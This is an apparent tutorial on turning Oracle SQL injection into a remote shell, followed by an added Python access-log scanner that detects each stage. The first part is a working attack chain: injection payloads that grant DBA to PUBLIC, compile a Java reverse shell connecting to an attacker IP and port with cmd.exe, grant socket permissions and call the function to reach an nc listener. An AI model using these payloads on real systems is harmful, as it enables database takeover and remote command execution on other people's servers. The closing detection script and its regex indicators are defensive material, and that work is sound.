Oracle SQL Injection to Getshell

Getting a shell

Oracle can run CMD commands directly, but that is cumbersome because there is no output echo, so here I bounce a shell straight back to an NC listener on a public VPS.

If the privileges are insufficient, you can try to escalate:

' and (SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant dba to public'''';END;'';END;--','SYS',0,'1',0)) is not null--

If the privileges are sufficient, go straight to creating the Java code (a Java reverse shell); replace the {} placeholders with your own IP and port:

' and (select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''create or replace and compile java source named "shell" as import java.io.*;import java.net.*;public class shell{public static void run() throws Exception {Socket s = new Socket("{IP}", {PORT});Process p = Runtime.getRuntime().exec("cmd.exe");new T(p.getInputStream(), s.getOutputStream()).start();new T(p.getErrorStream(), s.getOutputStream()).start();new T(s.getInputStream(), p.getOutputStream()).start();}static class T extends Thread {private InputStream i;private OutputStream u;public T(InputStream in, OutputStream out) {this.u = out;this.i = in;}public void run() {BufferedReader n = new BufferedReader(new InputStreamReader(i));BufferedWriter w = new BufferedWriter(new OutputStreamWriter(u));char f[] = new char[8192];int l;try {while ((l = n.read(f, 0, f.length)) > 0) {w.write(f, 0, l);w.flush();}} catch (IOException e) {}try {if (n != null)n.close();if (w != null)w.close();} catch (Exception e) {}}}}'''';END;'';END;--','SYS',0,'1',0) from dual) is not null--

Grant the Java code the permission it needs (a SocketPermission):

' and (select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.net.SocketPermission'''''''', ''''''''<>'''''''', ''''''''*'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) from dual) is not null--

Create the Oracle function:

' and (select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''create or replace function reversetcp RETURN VARCHAR2 as language java name ''''''''shell.run() return String''''''''; '''';END;'';END;--','SYS',0,'1',0) from dual) is not null--

Grant execute permission on the function:

' and (select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on reversetcp to public'''';END;'';END;--','SYS',0,'1',0) from dual) is not null--

Call the reversetcp function to bounce the shell to the nc listener on the public server:

' and (select sys.reversetcp from dual) is not null--
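From the defender's side, every stage of the chain above leaves the same fingerprints in the web server's access log: a call to DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES, an EXECUTE IMMEDIATE wrapped in PRAGMA AUTONOMOUS_TRANSACTION, a grant of DBA to PUBLIC, a Java source load, a dbms_java permission grant and a Java-backed function. As an added example that is not part of the original post, the Python below normalises request lines (URL decoding, including double encoding, plus stripping of `/**/` comment padding) and reports which stages appear; the log lines are constructed and the `normalise`, `classify` and `scan_log` helpers and indicator names are my own.

```python
import re
from urllib.parse import unquote_plus

# Indicators for the stages of the chain described on this page, matched
# against the normalised (URL-decoded, comment-stripped, lower-cased) request.
INDICATORS = {
    "dbms_export_extension": r"dbms_export_extension\.get_domain_index_tables",
    "autonomous_transaction": r"pragma\s+autonomous_transaction",
    "grant_dba_to_public": r"grant\s+dba\s+to\s+public",
    "java_source_load": r"create\s+or\s+replace\s+and\s+compile\s+java\s+source",
    "java_permission_grant": r"dbms_java\.grant_permission",
    "java_stored_function": r"language\s+java\s+name",
}

def normalise(raw):
    """URL-decode repeatedly (double encoding), strip /**/ comments, collapse whitespace."""
    text = raw
    for _ in range(3):
        decoded = unquote_plus(text)
        if decoded == text:
            break
        text = decoded
    text = re.sub(r"/\*.*?\*/", " ", text)  # /**/ is a common whitespace substitute
    return re.sub(r"\s+", " ", text).lower()

def classify(raw):
    """Return the names of all indicators present in one request line."""
    norm = normalise(raw)
    return [name for name, pat in INDICATORS.items() if re.search(pat, norm)]

def scan_log(lines):
    """Yield (line_no, indicators) for every access-log line that trips an indicator."""
    for n, line in enumerate(lines, 1):
        hits = classify(line)
        if hits:
            yield n, hits

# Constructed access-log lines (not real traffic): a benign request, the
# single-encoded grant-dba stage, a comment-padded dbms_java grant, and a
# double-encoded Java source load.
SAMPLE_LOG = [
    "203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] \"GET /item?id=42 HTTP/1.1\" 200 512",
    "203.0.113.7 - - [10/Oct/2023:13:55:40 +0000] \"GET /item?id=1%27%20and%20(SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(%27FOO%27,%27BAR%27,%27DBMS_OUTPUT%22.PUT(:P1);EXECUTE%20IMMEDIATE%20%27%27DECLARE%20PRAGMA%20AUTONOMOUS_TRANSACTION;BEGIN%20EXECUTE%20IMMEDIATE%20%27%27%27%27grant%20dba%20to%20public%27%27%27%27;END;%27%27;END;--%27,%27SYS%27,0,%271%27,0))%20is%20not%20null-- HTTP/1.1\" 500 0",
    "203.0.113.7 - - [10/Oct/2023:13:55:44 +0000] \"GET /item?id=1'/**/and/**/(select/**/SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT\".PUT(:P1);EXECUTE/**/IMMEDIATE/**/''begin/**/dbms_java.grant_permission(''''PUBLIC'''',''''SYS:java.net.SocketPermission'''',''''*'''',''''*'''');end;'';END;--','SYS',0,'1',0)/**/from/**/dual)/**/is/**/not/**/null-- HTTP/1.1\" 500 0",
    "203.0.113.7 - - [10/Oct/2023:13:55:49 +0000] \"GET /item?id=1%2527%2520and%2520(select%2520SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(%2527FOO%2527,%2527BAR%2527,%2527x%2522.PUT(:P1);EXECUTE%2520IMMEDIATE%2520%2527%2527create%2520or%2520replace%2520and%2520compile%2520java%2520source%2520named%2520%2522shell%2522%2520as%2520public%2520class%2520shell{}%2527%2527;END;--%2527,%2527SYS%2527,0,%25271%2527,0)%2520from%2520dual)%2520is%2520not%2520null-- HTTP/1.1\" 500 0",
]

if __name__ == "__main__":
    for n, hits in scan_log(SAMPLE_LOG):
        print(f"line {n}: {', '.join(hits)}")
```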
